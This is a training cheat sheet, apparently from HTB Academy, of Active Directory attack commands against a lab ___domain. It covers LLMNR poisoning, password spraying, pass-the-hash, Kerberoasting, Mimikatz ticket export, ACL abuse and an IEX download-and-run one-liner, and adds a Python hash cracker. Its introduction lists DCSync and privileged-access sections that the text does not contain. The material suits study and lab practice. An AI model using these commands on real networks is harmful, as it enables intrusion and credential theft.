ACTIVE DIRECTORY ENUMERATION & ATTACKS CHEAT SHEET
(HTB Academy, Active Directory Enumeration & Attacks module)

This document is a cheat sheet of commands used to enumerate and attack an Active Directory environment. It covers initial enumeration of a ___domain from Linux and Windows hosts, capturing LLMNR and NBT-NS traffic, cracking captured hashes, disabling NBT-NS, generating username combinations, and enumerating password policies from Windows and Linux hosts, then continues with credentialed enumeration, living-off-the-land enumeration, Kerberoasting, ACL abuse, DCSync and privileged access. The commands allow an attacker to discover information about users, credentials, and security configurations within an Active Directory network. Each command is followed by its description.
Initial Enumeration

nslookup ns1.inlanefreight.com
    Queries DNS to resolve the target name to its IP address (name-to-IP mapping) from a Linux-based host.

sudo tcpdump -i ens224
    Starts capturing network packets on the interface given after -i from a Linux-based host.

sudo responder -I ens224 -A
    Starts Responder on the interface given after -I in Analyze mode (-A): it listens for and logs LLMNR, NBT-NS and mDNS queries without answering (poisoning) them, which is the quiet way to see what name-resolution traffic exists on the segment. Performed from a Linux-based host.

fping -asgq 172.16.5.0/23
    Performs a ping sweep of the specified network segment from a Linux-based host (-a show only alive hosts, -s print statistics, -g generate the target list from the CIDR range, -q quiet).

sudo nmap -v -A -iL hosts.txt -oN /home/User/Documents/host-enum
    Runs an nmap scan with OS detection, version detection, script scanning and traceroute enabled (-A) against the list of hosts in the file given after -iL (hosts.txt), and writes the results in normal format to the file given after -oN. Performed from a Linux-based host.

sudo git clone https://github.com/ropnop/kerbrute.git
    Clones the Kerbrute repository with git from a Linux-based host.

make help
    Lists the build targets available in Kerbrute's Makefile from a Linux-based host.

sudo make all
    Compiles Kerbrute binaries for multiple OS platforms and CPU architectures.

./kerbrute_linux_amd64
    Runs the compiled Linux/amd64 Kerbrute binary to confirm it works, from a Linux-based host.

sudo mv kerbrute_linux_amd64 /usr/local/bin/kerbrute
    Moves the Kerbrute binary into a directory that is (or can be put) in the Linux user's PATH, so the tool can be run as kerbrute from anywhere.

./kerbrute_linux_amd64 userenum -d INLANEFREIGHT.LOCAL --dc 172.16.5.5 jsmith.txt -o kerb-results
    Runs Kerbrute to discover valid usernames in the ___domain given after -d (INLANEFREIGHT.LOCAL) via the ___domain controller given after --dc, using the wordlist jsmith.txt, and writes the results (-o) to the file kerb-results. No password is sent in these Kerberos pre-authentication probes, so they do not count against the account lockout threshold, but they are still visible in Kerberos audit logs on the DC. Performed from a Linux-based host.

LLMNR/NBT-NS Poisoning

responder -h
    Displays the usage instructions and the options available in Responder, from a Linux-based host.

hashcat -m 5600 forend_ntlmv2 /usr/share/wordlists/rockyou.txt
    Uses hashcat in NetNTLMv2 mode (-m 5600) to crack the NTLMv2 hashes captured by Responder and saved in the file forend_ntlmv2, using the specified wordlist. Performed from a Linux-based host.

Import-Module .\Inveigh.ps1
    Uses the Import-Module PowerShell cmdlet to import the Windows-based tool Inveigh.ps1.

(Get-Command Invoke-Inveigh).Parameters
    Outputs the parameters (options and functionality) available with Invoke-Inveigh. Performed from a Windows-based host.

Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y
    Starts Inveigh on a Windows-based host with LLMNR and NBNS spoofing enabled, prints captures to the console and also writes them to a file.

.\Inveigh.exe
    Starts the C# implementation of Inveigh from a Windows-based host.

$regkey = "HKLM:SYSTEM\CurrentControlSet\services\NetBT\Parameters\Interfaces"
Get-ChildItem $regkey | foreach { Set-ItemProperty -Path "$regkey\$($_.pschildname)" -Name NetbiosOptions -Value 2 -Verbose }
    PowerShell script that disables NBT-NS on a Windows host by setting NetbiosOptions to 2 (NetBIOS over TCP/IP disabled) on every network interface under the NetBT registry key. Must run as an administrator. LLMNR is disabled separately, through Group Policy (Turn off multicast name resolution).

Password Spraying & Password Policies

#!/bin/bash
for x in {{A..Z},{0..9}}{{A..Z},{0..9}}{{A..Z},{0..9}}{{A..Z},{0..9}}; do echo $x; done
    Bash script that generates every possible four-character username made of uppercase letters and digits (36^4 = 1,679,616 combinations) from a Linux-based host.

crackmapexec smb 172.16.5.5 -u avazquez -p Password123 --pass-pol
    Uses CrackMapExec with valid credentials (avazquez:Password123) to enumerate the ___domain password policy (--pass-pol) from a Linux-based host.

rpcclient -U "" -N 172.16.5.5
    Uses rpcclient to connect to the ___domain controller over an SMB NULL session (empty username, no password) and discover information about the ___domain. Performed from a Linux-based host.

rpcclient $> querydominfo
    Inside the rpcclient session, returns basic ___domain information (___domain name, number of users and groups); the password policy itself is returned by getdompwinfo. Performed from a Linux-based host.

enum4linux -P 172.16.5.5
    Uses enum4linux to enumerate the password policy (-P) of the target Windows ___domain from a Linux-based host.

enum4linux-ng -P 172.16.5.5 -oA ilfreight
    Uses enum4linux-ng to enumerate the password policy (-P) of the target Windows ___domain from a Linux-based host and saves the output in YAML and JSON to files named after the value given to -oA.

ldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength
    Uses ldapsearch with an anonymous bind (-x) to read the password policy attributes from the ___domain root of a target Windows ___domain from a Linux-based host; grep prints the first match for pwdHistoryLength and the ten lines before it (minPwdLength, lockoutThreshold and related attributes). Newer ldapsearch builds take -H ldap://172.16.5.5 in place of -h.

net accounts
    Enumerates the password policy of a Windows ___domain (lockout threshold, observation window, minimum length) from a ___domain-joined Windows-based host.

Import-Module .\PowerView.ps1
    Uses the Import-Module cmdlet to import the PowerView.ps1 tool on a Windows-based host.

Get-DomainPolicy
    PowerView function that enumerates the password policy of the target Windows ___domain from a Windows-based host.

enum4linux -U 172.16.5.5 | grep "user:" | cut -f2 -d"[" | cut -f1 -d"]"
    Uses enum4linux to discover user accounts in a target Windows ___domain, then uses grep and cut to reduce the output to bare usernames. Performed from a Linux-based host.

rpcclient -U "" -N 172.16.5.5
rpcclient $> enumdomusers
    Uses rpcclient over a NULL session to discover user accounts (and their RIDs) in a target Windows ___domain from a Linux-based host.

crackmapexec smb 172.16.5.5 --users
    Uses CrackMapExec to discover users (--users) in a target Windows ___domain from a Linux-based host.

ldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "(&(objectclass=user))" | grep sAMAccountName: | cut -f2 -d" "
    Uses ldapsearch with an anonymous bind to discover users in a target Windows ___domain, then filters the output with grep and cut to show only the sAMAccountName values. Performed from a Linux-based host.

./windapsearch.py --dc-ip 172.16.5.5 -u "" -U
    Uses the Python tool windapsearch.py with an anonymous bind (-u "") to discover users (-U) in a target Windows ___domain from a Linux-based host.

for u in $(cat valid_users.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 | grep Authority; done
    Bash one-liner that performs a password spraying attack with rpcclient, trying the password Welcome1 against each user in valid_users.txt, from a Linux-based host. grep Authority keeps only successful logons (getusername prints the authenticated account) and hides the failed attempts.

kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_users.txt Welcome1
    Uses Kerbrute and a list of users (valid_users.txt) to spray the password Welcome1 against the target Windows ___domain from a Linux-based host.

sudo crackmapexec smb 172.16.5.5 -u valid_users.txt -p Password123 | grep +
    Uses CrackMapExec and a list of users (valid_users.txt) to spray the password Password123 against the target Windows ___domain from a Linux-based host. grep + keeps only the [+] lines, i.e. successful logons.

sudo crackmapexec smb 172.16.5.5 -u avazquez -p Password123
    Uses CrackMapExec to validate a set of credentials from a Linux-based host.

sudo crackmapexec smb --local-auth 172.16.5.0/24 -u administrator -H 88ad09182de639ccc6579eb0849751cf | grep +
    Uses CrackMapExec to spray the local administrator's NT hash (-H, pass-the-hash) across the /24. --local-auth authenticates against each host's local SAM instead of the ___domain, so each host sees a single attempt against a local account and nothing counts against the ___domain lockout policy. grep + keeps only successful logons. Performed from a Linux-based host.

Import-Module .\DomainPasswordSpray.ps1
    Imports the PowerShell-based tool DomainPasswordSpray.ps1 on a Windows-based host.

Invoke-DomainPasswordSpray -Password Welcome1 -OutFile spray_success -ErrorAction SilentlyContinue
    Performs a password spraying attack with the password Welcome1 against the ___domain's users and writes successful logons (-OutFile) to the file spray_success. Performed from a ___domain-joined Windows-based host.

Enumerating Security Controls

Get-MpComputerStatus
    PowerShell cmdlet that checks the status of Windows Defender Antivirus (real-time protection, signature age) from a Windows-based host.

Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
    PowerShell cmdlet that shows the effective AppLocker rule collections from a Windows-based host.

$ExecutionContext.SessionState.LanguageMode
    PowerShell expression that reveals the PowerShell language mode in use on a Windows-based host (ConstrainedLanguage restricts which .NET types and tools can be used).

Find-LAPSDelegatedGroups
    LAPSToolkit function that discovers the groups delegated to read LAPS passwords, from a Windows-based host.

Find-AdmPwdExtendedRights
    LAPSToolkit function that checks the rights on each computer with LAPS enabled for any groups with read access and users with "All Extended Rights". Performed from a Windows-based host.

Get-LAPSComputers
    LAPSToolkit function that finds computers with LAPS enabled, shows password expiration times and, where the current user has read rights, the randomized local administrator passwords. Performed from a Windows-based host.

Credentialed Enumeration

xfreerdp /u:[email protected] /p:Klmcargo2 /v:172.16.5.25
    Connects to a Windows target over RDP with valid credentials (user, password and target given to /u, /p and /v). Performed from a Linux-based host.

sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --users
    Authenticates to a Windows target over SMB with valid credentials and enumerates the users (--users) of the target Windows ___domain. Performed from a Linux-based host.

sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --groups
    Authenticates to a Windows target over SMB with valid credentials and enumerates the groups (--groups) of the target Windows ___domain. Performed from a Linux-based host.

sudo crackmapexec smb 172.16.5.125 -u forend -p Klmcargo2 --loggedon-users
    Authenticates to a Windows target over SMB with valid credentials and l ists the users currently logged on to that host (--loggedon-users). Performed from a Linux-based host.

sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --shares
    Authenticates to a Windows target over SMB with valid credentials and enumerates its SMB shares and the access the supplied account has to each (--shares). Performed from a Linux-based host.

sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 -M spider_plus --share Dev-share
    Authenticates to a Windows target over SMB with valid credentials and runs the CrackMapExec module (-M) spider_plus, which crawls the readable share Dev-share and lists every readable file. The results are written as JSON. Performed from a Linux-based host.

smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H 172.16.5.5
    Lists the shares on the target host (-H) and the permissions the supplied ___domain account has on each. Performed from a Linux-based host.

smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H 172.16.5.5 -R SYSVOL --dir-only
    Recursively lists (-R) the SYSVOL share on the target host, showing directories only (--dir-only). Performed from a Linux-based host.

rpcclient $> queryuser 0x457
    Inside an rpcclient session, shows the details of the user account whose relative identifier (RID) is 0x457. Performed from a Linux-based host.

rpcclient $> enumdomusers
    Lists the user accounts of the target Windows ___domain together with their RIDs. Performed from a Linux-based host.

psexec.py inlanefreight.local/wley:'transporter@4'@172.16.5.125
    Impacket tool that opens a SYSTEM shell on a Windows target by uploading a service binary through the ADMIN$ share, using valid credentials (the account needs local administrator rights on the target). Performed from a Linux-based host.

wmiexec.py inlanefreight.local/wley:'transporter@4'@172.16.5.5
    Impacket tool that gives a semi-interactive shell on a Windows target via WMI with valid credentials, without installing a service. Performed from a Linux-based host.

windapsearch.py -h
    Displays the options and functionality of windapsearch.py. Performed from a Linux-based host.

python3 windapsearch.py --dc-ip 172.16.5.5 -u inlanefreight\wley -p transporter@4 --da
    Enumerates the members of the Domain Admins group (--da) against a target Windows ___domain using a valid set of credentials. Performed from a Linux-based host.

python3 windapsearch.py --dc-ip 172.16.5.5 -u inlanefreight\wley -p transporter@4 -PU
    Performs a recursive search for privileged users (-PU), i.e. users that end up in privileged groups through nested group membership, using valid credentials. Performed from a Linux-based host.

sudo bloodhound-python -u 'forend' -p 'Klmcargo2' -ns 172.16.5.5 -d inlanefreight.local -c all
    Runs the Python BloodHound collector (bloodhound.py) with valid credentials, using the ___domain controller as name server (-ns) for the target Windows ___domain inlanefreight.local (-d), and runs all collection methods (-c all). The resulting JSON files are imported into the BloodHound GUI. Performed from a Linux-based host.

Enumeration by Living Off the Land

All commands in this section are run from a ___domain-joined Windows-based host.

Get-Module
    PowerShell cmdlet that lists the modules imported into the current session (add -ListAvailable to list every module installed on the host).

Import-Module ActiveDirectory
    Loads the Active Directory PowerShell module (part of RSAT).

Get-ADDomain
    PowerShell cmdlet that gathers information about the current Windows ___domain.

Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
    PowerShell cmdlet that lists the user accounts of the target Windows ___domain that have a ServicePrincipalName set (Kerberoasting candidates).

Get-ADTrust -Filter *
    PowerShell cmdlet that enumerates every trust relationship (-Filter *) of the target Windows ___domain.

Get-ADGroup -Filter * | select name
    PowerShell cmdlet that enumerates all groups of the target Windows ___domain and shows only their names (select name).

Get-ADGroup -Identity "Backup Operators"
    PowerShell cmdlet that retrieves a specific group (-Identity "Backup Operators").

Get-ADGroupMember -Identity "Backup Operators"
    PowerShell cmdlet that lists the members of a specific group (-Identity "Backup Operators").

Export-PowerViewCSV
    PowerView function that appends results to a CSV file.

ConvertTo-SID
    PowerView function that converts a user or group name to its SID.

Get-DomainSPNTicket
    PowerView function that requests the Kerberos service ticket (TGS) for a specified service principal name (SPN).

Get-Domain
    PowerView function that returns the AD object for the current (or specified) ___domain.

Get-DomainController
    PowerView function that returns the ___domain controllers of the current (or specified) ___domain.

Get-DomainUser
    PowerView function that returns all users or specific user objects in AD.

Get-DomainComputer
    PowerView function that returns all computers or specific computer objects in AD.

Get-DomainGroup
    PowerView function that returns all groups or specific group objects in AD.

Get-DomainOU
    PowerView function that searches for all or specific OU objects in AD.

Find-InterestingDomainAcl
    PowerView function that finds object ACLs in the ___domain with modification rights granted to non-built-in objects.

Get-DomainGroupMember
    PowerView function that returns the members of a specific ___domain group.

Get-DomainFileServer
    PowerView function that returns a list of servers likely functioning as file servers.

Get-DomainDFSShare
    PowerView function that returns all distributed file system (DFS) shares of the current (or specified) ___domain.

Get-DomainGPO
    PowerView function that returns all GPOs or specific GPO objects in AD.

Get-DomainPolicy
    PowerView function that returns the default ___domain policy or the ___domain controller policy of the current ___domain.

Get-NetLocalGroup
    PowerView function that enumerates the local groups on the local or a remote machine.

Get-NetLocalGroupMember
    PowerView function that enumerates the members of a specific local group.

Get-NetShare
    PowerView function that returns the open shares on the local (or a remote) machine.

Get-NetSession
    PowerView function that returns session information for the local (or a remote) machine.

Test-AdminAccess
    PowerView function that tests whether the current user has administrative access to the local (or a remote) machine.

Find-DomainUserLocation
    PowerView function that finds the machines where specific users are logged in.

Find-DomainShare
    PowerView function that finds reachable shares on ___domain machines.

Find-InterestingDomainShareFile
    PowerView function that searches for files matching specific criteria on readable shares in the ___domain.

Find-LocalAdminAccess
    PowerView function that finds machines in the local ___domain where the current user has local administrator access.

Get-DomainTrust
    PowerView function that returns the ___domain trusts of the current or a specified ___domain.

Get-ForestTrust
    PowerView function that returns all forest trusts of the current or a specified forest.

Get-DomainForeignUser
    PowerView function that enumerates users who are in groups outside of the user's ___domain.

Get-DomainForeignGroupMember
    PowerView function that enumerates groups with members outside of the group's ___domain and returns each foreign member.

Get-DomainTrustMapping
    PowerView function that enumerates all trusts of the current ___domain and of any other ___domain reached through them.

Get-DomainGroupMember -Identity "Domain Admins" -Recurse
    PowerView function that lists every member of the target group ("Domain Admins"), expanding nested groups (-Recurse).

Get-DomainUser -SPN -Properties samaccountname,ServicePrincipalName
    PowerView function that finds the users of the target Windows ___domain that have a Service Principal Name set.

.\Snaffler.exe -d INLANEFREIGHT.LOCAL -s -v data
    Runs Snaffler against the target Windows ___domain (-d) to find credentials and other sensitive data in the shares the compromised account can read; -s prints findings to stdout as they are found and -v data limits the output to the data found.

Transferring Files

sudo python3 -m http.server 8001
    Starts a Python web server on port 8001 for quick hosting of files. Performed from a Linux-based host.

"IEX(New-Object Net.WebClient).downloadString('http://172.16.5.222/SharpHound.exe')"
    PowerShell one-liner that downloads content from a web server and executes it in memory with IEX. Performed from a Windows-based host. IEX only runs PowerShell script text; to fetch a binary such as SharpHound.exe to disk, use (New-Object Net.WebClient).DownloadFile(url, path) instead.

impacket-smbserver -ip 172.16.5.x -smb2support -username user -password password shared /home/administrator/Downloads/
    Starts an Impacket SMB server that exposes /home/administrator/Downloads/ as the share "shared", with SMB2 support and simple credentials (user:password), for quick file transfer to and from Windows hosts. Performed from a Linux-based host.
Kerberoasting

sudo python3 -m pip install .
    Installs Impacket from inside its cloned repository directory on the attack host. Performed from a Linux-based host.

GetUserSPNs.py -h
    Displays the options and functionality of the Impacket tool GetUserSPNs.py from a Linux-based host.

GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/mholliday
    Impacket tool that lists the SPNs (and the accounts they belong to) in the target Windows ___domain, authenticating as mholliday. Performed from a Linux-based host.

GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/mholliday -request
    Requests (-request) a TGS ticket for every SPN account and prints the hashes for offline cracking. Performed from a Linux-based host.

GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/mholliday -request-user sqldev
    Requests a TGS ticket for a specific account (-request-user sqldev). Performed from a Linux-based host.

GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/mholliday -request-user sqldev -outputfile sqldev_tgs
    Requests a TGS ticket for a specific account and writes the hash to a file (-outputfile sqldev_tgs). Performed from a Linux-based host.

hashcat -m 13100 sqldev_tgs /usr/share/wordlists/rockyou.txt --force
    Attempts to crack the Kerberos 5 TGS-REP etype 23 (RC4-HMAC) hash (-m 13100) in sqldev_tgs with hashcat and the rockyou.txt wordlist. Performed from a Linux-based host.

setspn.exe -Q */*
    Enumerates the SPNs in the target Windows ___domain from a Windows-based host.

Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DEV-PRE-SQL.inlanefreight.local:1433"
    PowerShell that requests a TGS ticket for a specific SPN; the ticket lands in the current session's ticket cache. Performed from a Windows-based host.

setspn.exe -T INLANEFREIGHT.LOCAL -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }
    Requests TGS tickets for every SPN that setspn finds, from a Windows-based host.

mimikatz # base64 /out:true
    Mimikatz command that makes exported tickets print to the console as base64 instead of being written to .kirbi files. Performed from a Windows-based host.

mimikatz # kerberos::list /export
    Mimikatz command that lists and extracts the TGS tickets in the current session from a Windows-based host.

echo "<base64 blob>" | tr -d \\n
    Removes the line breaks from the base64 ticket printed by Mimikatz so it can be decoded. Performed from a Linux-based host.

cat encoded_file | base64 -d > sqldev.kirbi
    Base64-decodes the file encoded_file into the binary ticket file sqldev.kirbi. Performed from a Linux-based host.

python2.7 kirbi2john.py sqldev.kirbi
    Extracts the encrypted part of the ticket from the .kirbi file into a John-format hash, written to the file crack_file. Performed from a Linux-based host.

sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > sqldev_tgs_hashcat
    Rewrites the John-format hash in crack_file into hashcat's -m 13100 format (inserts the etype 23 field and wraps the account name in asterisks) and saves it as sqldev_tgs_hashcat. Performed from a Linux-based host.

cat sqldev_tgs_hashcat
    Views the prepared hash from a Linux-based host.

hashcat -m 13100 sqldev_tgs_hashcat /usr/share/wordlists/rockyou.txt
    Cracks the prepared Kerberos ticket hash (sqldev_tgs_hashcat) with a wordlist (rockyou.txt) from a Linux-based host.

Import-Module .\PowerView.ps1
Get-DomainUser * -spn | select samaccountname
    Imports PowerView and lists the accounts that have an SPN set, i.e. the Kerberoasting targets. Performed from a Windows-based host.

Get-DomainUser -Identity sqldev | Get-DomainSPNTicket -Format Hashcat
    PowerView: requests the TGS ticket for a specific account (sqldev) and formats it for hashcat. Performed from a Windows-based host.

Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\ilfreight_tgs.csv -NoTypeInformation
    PowerView: requests TGS tickets for all SPN accounts and exports them to the CSV file ilfreight_tgs.csv. Performed from a Windows-based host.

cat .\ilfreight_tgs.csv
    Views the contents of the .csv file from a Windows-based host.

.\Rubeus.exe
    Shows the options and functionality of Rubeus. Performed from a Windows-based host.

.\Rubeus.exe kerberoast /stats
    Shows Kerberoasting statistics (/stats) for the target Windows ___domain: how many roastable accounts exist, their supported encryption types and the years their passwords were last set, without requesting any tickets. Performed from a Windows-based host.

.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap
    Requests TGS tickets only for SPN accounts with adminCount set to 1 (protected, privileged accounts) and prints each hash on a single line (/nowrap) so it can be copied straight into hashcat. Performed from a Windows-based host.

.\Rubeus.exe kerberoast /user:testspn /nowrap
    Requests a TGS ticket for a specific account (/user:testspn) and prints the hash on a single line (/nowrap). Performed from a Windows-based host.

Get-DomainUser testspn -Properties samaccountname,serviceprincipalname,msds-supportedencryptiontypes
    PowerView: checks the msDS-SupportedEncryptionTypes attribute of a specific account (testspn). If the account only supports AES, the ticket comes back AES-encrypted and must be cracked with hashcat -m 19600 (AES128) or -m 19700 (AES256), which is far slower than RC4. Performed from a Windows-based host.

hashcat -m 13100 rc4_to_crack /usr/share/wordlists/rockyou.txt
    Attempts to crack the RC4 ticket hash in rc4_to_crack with a wordlist (rockyou.txt) from a Linux-based host.
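Both hash formats this cheat sheet feeds to hashcat, the NTLMv2 lines Responder and Inveigh capture in the LLMNR/NBT-NS section (-m 5600) and the RC4-HMAC TGS tickets from this section (-m 13100), are crackable offline for the same reason: each is a keyed MD5 construction over data the attacker already holds, with the NT hash of the account's password as the only secret. The following is an added example, not code from the HTB module or any of the tools it lists. It implements both checks from scratch so the formats can be read line by line; MD4 is written out because hashlib's md4 is often disabled under OpenSSL 3. The sample lines are constructed with the assumed password Welcome1 (a spray password from the cheat sheet) and the forend, sqldev and MSSQLSvc names it uses; they are not real captures.

```python
"""Offline check of the two hash formats this cheat sheet hands to hashcat: NTLMv2
responses caught by Responder/Inveigh (-m 5600) and RC4-HMAC, etype 23, TGS tickets
from Kerberoasting (-m 13100). Added example, not HTB module code."""
import hashlib, hmac, struct

M32 = 0xFFFFFFFF


def _rot(x, n):
    return ((x << n) | (x >> (32 - n))) & M32


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4; the NT hash is MD4 over the UTF-16LE encoded password."""
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    n = len(data)
    data += b"\x80" + b"\x00" * ((55 - n) % 64) + struct.pack("<Q", n * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    order3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(data), 64):
        x = struct.unpack("<16I", data[off:off + 64])
        a, b, c, d = state
        for i in range(16):  # round 1
            a = _rot((a + f(b, c, d) + x[i]) & M32, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2
            a = _rot((a + g(b, c, d) + x[(i % 4) * 4 + i // 4] + 0x5A827999) & M32, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3
            a = _rot((a + h(b, c, d) + x[order3[i]] + 0x6ED9EBA1) & M32, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        state = [(s + v) & M32 for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16-le"))


def hmac_md5(key: bytes, msg: bytes) -> bytes:
    return hmac.new(key, msg, hashlib.md5).digest()


def rc4(key: bytes, data: bytes) -> bytes:
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


# NTLMv2 (hashcat -m 5600 line): USER::DOMAIN:server_challenge:NTProofStr:blob, all hex.
def ntlmv2_proof(password, user, ___domain, server_challenge, blob):
    v2_key = hmac_md5(nt_hash(password), (user.upper() + ___domain).encode("utf-16-le"))
    return hmac_md5(v2_key, server_challenge + blob)


def crack_ntlmv2(line, candidates):
    user, _, ___domain, chal, proof, blob = line.split(":")
    for pw in candidates:
        if ntlmv2_proof(pw, user, ___domain, bytes.fromhex(chal), bytes.fromhex(blob)) == bytes.fromhex(proof):
            return pw
    return None


# Kerberoast (hashcat -m 13100 line): $krb5tgs$23$*user$realm$spn*$checksum$edata2
TICKET_KEY_USAGE = 2  # RFC 4120 key usage number for a ticket's enc-part


def rc4_hmac_encrypt(key, plaintext, confounder):
    k1 = hmac_md5(key, struct.pack("<I", TICKET_KEY_USAGE))
    checksum = hmac_md5(k1, confounder + plaintext)
    return checksum + rc4(hmac_md5(k1, checksum), confounder + plaintext)


def crack_krb5tgs(line, candidates):
    head, checksum_hex, edata_hex = line.rsplit("$", 2)
    if head.split("$")[2] != "23":
        raise ValueError("only etype 23 handled; AES tickets are hashcat -m 19600/19700")
    checksum, edata = bytes.fromhex(checksum_hex), bytes.fromhex(edata_hex)
    for pw in candidates:
        k1 = hmac_md5(nt_hash(pw), struct.pack("<I", TICKET_KEY_USAGE))
        plain = rc4(hmac_md5(k1, checksum), edata)  # confounder || EncTicketPart
        if hmac_md5(k1, plain) == checksum:
            return pw
    return None


# Constructed samples (not real captures); the password "Welcome1" is an assumption.
SAMPLE_PASSWORD = "Welcome1"


def sample_ntlmv2_line():
    chal = bytes.fromhex("1122334455667788")
    blob = bytes.fromhex("0101000000000000") + b"\x00" * 24  # stand-in for the NTLMv2 blob
    proof = ntlmv2_proof(SAMPLE_PASSWORD, "forend", "INLANEFREIGHT", chal, blob)
    return f"forend::INLANEFREIGHT:{chal.hex()}:{proof.hex()}:{blob.hex()}"


def sample_krb5tgs_line():
    edata = rc4_hmac_encrypt(nt_hash(SAMPLE_PASSWORD), b"EncTicketPart stand-in", b"\x00" * 8)
    spn = "MSSQLSvc/DEV-PRE-SQL.inlanefreight.local:1433"
    return f"$krb5tgs$23$*sqldev$INLANEFREIGHT.LOCAL${spn}*${edata[:16].hex()}${edata[16:].hex()}"
```

The two crack functions are the single-candidate version of what hashcat does at scale: derive the NT hash of a guess, run it through the format's key derivation, and compare. hashcat checks the decrypted ticket's ASN.1 header instead of recomputing the HMAC, which is faster but equivalent for a correct guess.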

ACL Enumeration & Tactics

All commands in this section are run from a Windows-based host.

Find-InterestingDomainAcl
    PowerView function that finds object ACLs in the target Windows ___domain with modification rights granted to non-built-in objects.

Import-Module .\PowerView.ps1
$sid = Convert-NameToSid wley
    Imports PowerView and stores the SID of a specific user account (wley) in $sid.

Get-DomainObjectACL -Identity * | ? {$_.SecurityIdentifier -eq $sid}
    Finds every ___domain object over which the user has rights, by matching the user's SID against the SecurityIdentifier of each ACE. Without -ResolveGUIDs, extended rights are shown as raw GUIDs.

$guid= "00299570-246d-11d0-a768-00aa006e0529"
Get-ADObject -SearchBase "CN=Extended-Rights,$((Get-ADRootDSE).ConfigurationNamingContext)" -Filter {ObjectClass -like 'ControlAccessRight'} -Properties * | Select Name,DisplayName,DistinguishedName,rightsGuid | ?{$_.rightsGuid -eq $guid} | fl
    Looks a rights GUID up in the Extended-Rights container of the configuration partition to map it back to the name of the extended right it represents (this GUID is User-Force-Change-Password).

Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid}
    Same search as above, but with -ResolveGUIDs PowerView translates the GUIDs in each ACE into readable right names.

Get-ADUser -Filter * | Select-Object -ExpandProperty SamAccountName > ad_users.txt
    Writes the SamAccountName of every user in the target Windows ___domain to a text file (ad_users.txt).

foreach($line in [System.IO.File]::ReadLines("C:\Users\htb-student\Desktop\ad_users.txt")) {get-acl "AD:\$(Get-ADUser $line)" | Select-Object Path -ExpandProperty Access | Where-Object {$_.IdentityReference -match 'INLANEFREIGHT\\wley'}}
    A foreach loop that reads each username from ad_users.txt, retrieves the ACL of that user object with Get-Acl, and keeps only the ACEs whose IdentityReference is INLANEFREIGHT\wley, i.e. the user objects wley has rights over. Uses only the built-in AD module, no PowerView.

$SecPassword = ConvertTo-SecureString '<PASSWORD HERE>' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\wley', $SecPassword)
    Creates a PSCredential object for wley from the password, so that later PowerView commands can run as wley.

$damundsenPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force
    Creates a SecureString object holding the new password to set for damundsen.

Set-DomainUserPassword -Identity damundsen -AccountPassword $damundsenPassword -Credential $Cred -Verbose
    PowerView function that changes the password of a specific user (damundsen) in the target Windows ___domain using wley's credentials, abusing wley's ForceChangePassword right over damundsen.

Get-ADGroup -Identity "Help Desk Level 1" -Properties * | Select -ExpandProperty Members
    Active Directory module cmdlet that views the members of a target security group (Help Desk Level 1).

Add-DomainGroupMember -Identity 'Help Desk Level 1' -Members 'damundsen' -Credential $Cred2 -Verbose
    PowerView function that adds a specific user (damundsen) to a specific security group (Help Desk Level 1) in the target Windows ___domain. $Cred2 is a PSCredential for damundsen, built the same way as $Cred from the password set above.

Get-DomainGroupMember -Identity "Help Desk Level 1" | Select MemberName
    PowerView function that views the members of a specific security group (Help Desk Level 1) and outputs only the username of each member (Select MemberName).

